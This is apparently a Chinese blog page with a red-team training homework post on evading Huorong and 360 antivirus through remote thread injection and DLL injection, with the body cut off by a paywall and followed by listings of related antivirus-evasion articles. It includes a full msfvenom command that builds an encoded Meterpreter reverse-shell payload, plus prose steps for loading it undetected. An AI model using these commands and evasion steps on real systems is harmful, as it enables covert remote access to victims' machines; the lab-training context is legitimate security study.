红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?

最新推荐文章于 2024-08-25 14:31:40 发布
最新推荐文章于 2024-08-25 14:31:40 发布
阅读量1.4k 收藏 8
点赞数
文章标签: 编程语言 人工智能 java 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/120124570
版权
本文是红队培训班的作业,作者通过远程线程注入、DLL注入、Shellcode加载器、Ladon混淆和无文件落地等方法,测试了如何绕过火绒和360的安全防护。在各种技术的免杀测试中,这些方法均成功避开了杀毒软件的检测,展示了在实际攻防中的潜在应用。
摘要由CSDN通过智能技术生成

文章来源|MS08067 红队培训班第12节课作业

本文作者:某学员A(红队培训班1期学员)


按老师要求尝试完成布置的作业如下:

一、远程线程注入

(一)通过MSF生成payload

通过msfvenom生成payload,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.61.103 lport=4444 -e x86/shikata_ga_nai -i 5 -f c -o ./Desktop/1.c


(二)通过远程线程注入加载payload

通过VS2019对payload进行处理:
    编译生成Project1.exe,将其传入装有360和火绒的Windows靶机进行免杀测试。

(三)检测免杀

在Kali上开启msf监听

在靶机上运行Project1.exe,Kali机器获取到Session,并且360和火绒均未报毒

二、DLL注入

(一)通过DLL注入加载Payload

通过VS2019编译DLL文件,该DLL文件将加载之前用MSF产生的payload,经regsvr32测试可以使用

再通过VS2019编译DLL加载器,该加载器将会把指定DLL(Dll1.dll)加载到指定进程

(二)检测免杀

在Kali机器上开启msf监听

开启calc.exe,获取其PID信息

运行Project1.exe,Kali机器获取到Session,且火绒和360未报毒

三、Shellcode加载器

&#x

最低0.47元/天 解锁文章
Ms08067安全实验室
关注
简单免杀火绒360极速版
摔不死的笨鸟的博客
03-03 1970
免杀
火绒安全软件和360的对比
大龄码农,啥都分享~
08-23 479
火绒安全的安装包小巧,仅 9.1MB 大小,却集成了丰富多样的功能,如防火墙、杀毒引擎、HIPS、弹窗拦截、文件粉碎、垃圾清理、系统右键管理等。总之,火绒安全软件以其轻量级设计、全面防护与杀毒能力、良好的用户体验、定制化安全、多功能集成以及企业版高级防护功能等优势,成为了国内备受瞩目的杀毒软件之一。无论是个人用户还是企业用户,选择火绒安全软件,都能提升自己的安全防护能力,畅享加纯净、安全的网络环境。这些功能的集成,为用户提供了一站式的安全解决方案,无需再安装多个安全软件,节省了系统资源,提高了使用效率。
杀软对抗 ----> 你真的免杀火绒了吗?
最新发布
huohaowen的博客
08-25 798
免杀的都知道,我们说到国产,基本上都是360,对于火绒,是非常好过的(一个动态调用就过了,没啥好说的),但是!!!!新版的火绒新增了一个功能!!内存扫描!!!这时候某顶级EDR就第一个不服了我们众所周知,卡巴斯基的内存扫描是特别强大的!!网上很多人的用cs说什么技术能直接绕过卡巴斯基上线大部分都是假的(内存扫描一扫就挂)而且cs的流量早就被研究的死死的了,就算你配上C2Profile也是存活不久!!!
Bypass AV meterpreter免杀技巧
weixin_30517001的博客
03-19 1769
0x01 meterpreter简介 MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断新,使得缓冲区溢出测试变的方便和简单。 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没...
小七免杀 源码免杀培训班
websssssss的专栏
08-18 1934
被杀毒软件误杀 为什么不学习免杀呢?小七免杀论坛 2013年源码免杀培训课程,带你走进杀毒软件的世界。 百度网盘:http://pan.baidu.com/s/1i3yxshB 提取密码:tt0q 第一课:你懂什么是免杀么? 第二课:你会编程环境和免杀环境的搭建么? 第三课:原始免杀真的老去了么?myccl抗干扰测试 第四课:我们要学习C语言干嘛用(1)? 第五课:我
红队免杀实战班开班倒计时2天,你准备好了吗?
Ms08067安全实验室
09-27 208
“第二期”2022.9.30开班第二期新增:除了对课程进行了优化,另增加了2节课,免杀实战中的常见技法,dll文件及编写和反沙盒和反调试机制;常见的恶意代码中的加壳和常见的恶意代码中的脱壳。免杀,wiki百科:反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀...
红队培训班作业 | 免杀360火绒 四种方法大对比
Ms08067安全实验室
08-16 2974
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
红队培训班作业 | 混淆&反沙盒机制&隐藏shellcode 过杀软静态检测
Ms08067安全实验室
09-07 549
本文作者:某学员A(红队培训班2期学员)1、加密或编码或混淆过杀软静态检测l 如下代码为实现payload经过fernet对称加密的shellcode生成器:#coding:utf-8 ...
红队培训班作业 | CS和MSF的进阶实战使用
Ms08067安全实验室
07-29 596
文章来源|MS08067 红队培训班第11节课作业本文作者:汤浩荡(红队培训班学员)按老师要求完成布置的作业如下:环境准备: Kali linux:cs客户端即msf。 阿...
红队作业 | Python实现免杀远控
Ms08067安全实验室
12-03 885
文章来源|MS08067 红队培训班 第4期本文作者:学员A(红队培训班4期学员)按老师要求尝试完成布置的作业如下:要想实现简易远控,说的详细点就是反弹shell,首先要解决三个问题:1....
CS-Loader:CS免杀
03-22
CS-避免杀人 CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell的免杀(已完成) V2.0:开发出UI界面 V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式具有扩展性 关于自己写的在线免杀平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
红队免杀培训第一章-不可执行的shellcode
Gamma_lab的博客
03-05 629
临近全国hw,后面会陆续推出红队免杀培训文章,希望能到诸君能在赛场上乱免,不会把现成的加载器放出来,但是例子改一下就是一个好的加载器,强调一遍,免杀并不是一种技术的一支独秀,而是百花齐放! 前言: ​ 这里照常去做CS的免杀加载器的实现,因为用先有的c2框架是非常方便顺手,当然你自己开发的c2框架也行,肯定也有生成shellcode这个功能,也需要进行内存执行的需求。 ​ 今天要讲的这种原理是根据ntdll.dll先有的指令来执行我们的代码,恶意代码保存在于数据部分中,这种的好处是我们绕过了不可执行的内
Python免杀火绒360和Defender
热门推荐
江左盟的博客
10-10 2万+
目录 简介 环境 原理 加载ShellCode 定位特征码 Base64编码绕过 简介 之前学习免杀都是使用Metasploit自带的编码进行,从未成功过。也使用过GitHub上别人提供的免杀方法,最近学习并实践发现绕过国内的杀毒软件貌似并不难,本文使用手工分析特征码,使用base64编码绕过杀毒软件静态分析。虽然使用的方法比较简单,但对实际做免杀免杀研究还是有一定意义的。 环境 Windows 10 x64 Python 3.8.3 Pyinstaller 火绒版本:5.0..
C语言绕过杀毒软件,易语言插件规避杀毒软件方法
weixin_28716723的博客
05-19 1827
易语言是一门计算机编程语言,非常的简单易懂,学习的时候无需英语基础即可快速入门。同时易语言的兼容性和稳定性也比较的强大,我们可以用他开发出各种平台的应用软件、网络软件、信息管理软件等等,但是由于易语言是中文编程,好多杀软都会误报,下面就教大家一个简单的方法,防止易语言误报。1、这里就不给大家演示易语言的安装过程了,官方的语言视频教程已经很详细了,我们首先去下载下“黑月插件”,直接百度,第一个就可以...
免杀Bypass!可过WDF/360/火绒的C#混淆器
潇湘信安的博客
04-10 773
一个可用于免杀过WDF/360/火绒的C#混淆器,但只能混淆.Net Framework应用程序。
红队培训班作业 | backdoor制作后门文件并上线MSF
Ms08067安全实验室
07-21 343
文章来源|MS08067 红队培训班第9节课作业本文作者:莫名的Low(红队培训班学员)按老师要求完成布置的作业如下:backdoor下载地址:https://github.com/sec...
白帽子黑客教你:如何在线检测木马免沙效果?能否躲过360查沙?
Kali与编程
08-29 691
一、背景介绍 对于渗透小伙伴来说,我们经常会做一些渗透小实验,需要用到木马文件,我们如何在不进行实战操作的情况下进行木马免杀效果检测呢?接下里让我们一起学习(通过介绍两个免杀检测网站进行操作)! 二、资源装备 安装好Kali2020.2的虚拟机一台; 需要检测的文件; 整装待发的小白一个。 三、战略安排 3.1 第一个免杀效果检测网站介绍,如下图所示。 在百度搜索框搜索关键字virustotal进行检测搜索,如下图所示,进入virtual官网。 3.2 网站初始化,如下图所示。 3.3 选择Choo
免杀实战知识汇总~
Ms08067安全实验室
09-21 527
“第二期”2022.9.30开班第二期新增:除了对课程进行了优化,另增加了2节课,免杀实战中的常见技法,dll文件及编写和反沙盒和反调试机制;常见的恶意代码中的加壳和常见的恶意代码中的脱壳。免杀,wiki百科:反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反杀...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值